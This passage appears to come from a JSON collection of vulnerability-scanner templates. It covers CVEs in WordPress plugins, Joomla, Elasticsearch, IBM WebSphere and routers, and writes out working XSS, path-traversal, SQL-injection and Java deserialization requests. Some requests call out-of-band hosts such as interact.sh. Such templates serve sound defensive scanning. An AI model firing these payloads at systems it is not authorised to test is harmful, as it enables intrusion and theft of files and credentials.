Snippets"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6982","info":{"name":"Devalcms 1.4a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sub menu for: <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2008-6080","info":{"name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2650","info":{"name":"CMSimple 3.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000005","info":{"name":"WordPress Candidate Application Form <= 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7450","info":{"name":"IBM WebSphere Java Object Deserialization - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: \"urn:AdminService\"\n\n<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\n<operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">{{ generate_java_gadget(\"dns\", \"{{interactsh-url}}\", \"base64-raw\")}}</params>\n<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["SOAP-ENV:Server","<faultcode>"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2015-5531","info":{"name":"ElasticSearch <1.6.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["PUT /_snapshot/test HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test\"\n    }\n}\n","PUT /_snapshot/test2 HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test/snapshot-backdata\"\n    }\n}\n","GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ElasticsearchParseException","Failed to derive xcontent from","114, 111, 111, 116, 58"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-6544","info":{"name":"Combodo iTop <2.2.0-2459 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6477","info":{"name":"Nordex NC2  - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert('{{randstr}}')</script>"]}]}]},{"id":"CVE-2015-4062","info":{"name":"WordPress NewStatPress 0.9.8 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 20s\nGET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body_2, \"newstatpress_page_nsp_search\")"],"condition":"and"}]}]},{"id":"CVE-2015-7297","info":{"name":"Joomla! Core SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2015-3035","info":{"name":"TP-LINK - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2068","info":{"name":"Magento Server Mass Importer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4694","info":{"name":"WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2755","info":{"name":"WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin.php?page=ab_map_options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>+-+-1-+-+alert(document.domain)</script>\")","contains(body_2, \"ab-google-map-travel\")"],"condition":"and"}]}]},{"id":"CVE-2015-4666","info":{"name":"Xceedium Xsuite <=2.4.4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7780","info":{"name":"ManageEngine Firewall Analyzer <8.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3648","info":{"name":"ResourceSpace - Local File inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3897","info":{"name":"Bonita BPM Portal <6.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd","{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2015-1000012","info":{"name":"WordPress MyPixs <=0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4668","info":{"name":"Xsuite <=2.4.4.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/openwin.php?redirurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-5471","info":{"name":"Swim Team <= v1.44.10777 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8813","info":{"name":"Umbraco <7.4.0- Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2015-2794","info":{"name":"DotNetNuke 07.04.00 - Administration Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Administrative Information","Database Information"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2196","info":{"name":"WordPress Spider Calendar <=1.4.9 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"{\\\"status\\\":true,\\\"data\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2015-3337","info":{"name":"Elasticsearch - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7245","info":{"name":"D-Link DVG-N5402SP - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /cgibin/webproc HTTP/1.1\nHost: {{Hostname}}\n\ngetpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2015-7823","info":{"name":"Kentico CMS 8.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-4414","info":{"name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4632","info":{"name":"Koha 3.20.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1635","info":{"name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Range":"bytes=0-18446744073709551615"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HTTP Error 416","The requested range is not satisfiable"],"condition":"and"},{"type":"word","part":"header","words":["Microsoft"]}]}]},{"id":"CVE-2015-2863","info":{"name":"Kaseya Virtual System Administrator - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me","{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-0554","info":{"name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlsecurity.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wpapskkey","var WscDevPin","var sessionkey"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000010","info":{"name":"WordPress Simple Image Manipulator < 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8349","info":{"name":"SourceBans <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9480","info":{"name":"WordPress RobotCPA 5 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3224","info":{"name":"Ruby on Rails Web Console - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{randstr}}"],"headers":{"X-Forwarded-For":"::1"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Rails.root:","Action Controller: Exception caught"],"condition":"and"},{"type":"word","part":"response","words":["X-Web-Console-Session-Id","data-remote-path=","data-session-id="],"case-insensitive":true,"condition":"or"}]}]},{"id":"CVE-2015-2080","info":{"name":"Eclipse Jetty <9.2.9.v20150224 - Sensitive Information 